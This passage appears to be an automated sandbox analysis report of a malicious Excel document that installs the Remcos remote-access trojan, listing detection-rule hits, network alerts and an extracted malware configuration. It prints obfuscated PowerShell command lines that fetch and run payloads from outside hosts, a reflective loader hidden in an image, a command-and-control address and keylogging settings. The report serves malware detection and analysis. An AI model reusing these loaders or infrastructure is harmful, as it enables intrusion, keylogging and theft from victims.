"C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 4080, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                    Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'
                    Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3480, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3764, ProcessName: mshta.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTd
GFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 4080, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl
                    Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'[base64 payload omitted]'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", ProcessId: 3976, ProcessName: csc.exe
                    Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3480, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                    Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS
                    Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 1908, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn", ProcessId: 1432, ProcessName: RegAsm.exe
                    Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3480, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = 
{1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERB
VEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 4080, ProcessName: wscript.exe
                    Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3480, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))", CommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgI
                    Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\yd20fzhg.x0b.ps1

                    Data Obfuscation

                    Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'[base64 payload omitted]'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", ProcessId: 3976, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 1908, TargetFilename: C:\ProgramData\remcos\logs.dat
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-08T15:23:40.699679+0200 | 2024197 | 1 | A Network Trojan was detected | 192.3.220.40 | 80 | 192.168.2.22 | 49162 | TCP
                    2024-10-08T15:23:43.864669+0200 | 2024197 | 1 | A Network Trojan was detected | 192.3.220.40 | 80 | 192.168.2.22 | 49164 | TCP
                    2024-10-08T15:23:40.699677+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49162 | 192.3.220.40 | 80 | TCP
                    2024-10-08T15:23:43.864625+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 192.3.220.40 | 80 | TCP
                    2024-10-08T15:24:01.627421+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49172 | 192.3.220.40 | 80 | TCP
                    2024-10-08T15:24:01.381632+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49171 | TCP
                    2024-10-08T15:24:21.488970+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
                    2024-10-08T15:24:01.381632+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49171 | TCP
                    2024-10-08T15:24:21.488970+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
                    2024-10-08T15:24:02.926947+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49173 | 135.148.195.248 | 6875 | TCP
                    2024-10-08T15:24:03.976682+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 135.148.195.248 | 6875 | TCP
                    2024-10-08T15:24:00.186433+0200 | 2049038 | 1 | A Network Trojan was detected | 207.241.227.242 | 443 | 192.168.2.22 | 49166 | TCP
                    2024-10-08T15:24:20.543211+0200 | 2049038 | 1 | A Network Trojan was detected | 207.241.227.242 | 443 | 192.168.2.22 | 49176 | TCP
                    2024-10-08T15:24:04.397505+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | TCP

                    AV Detection

                    Source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: QPS-36477.xls, ReversingLabs: Detection: 18%
                    Source: Yara match, File source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
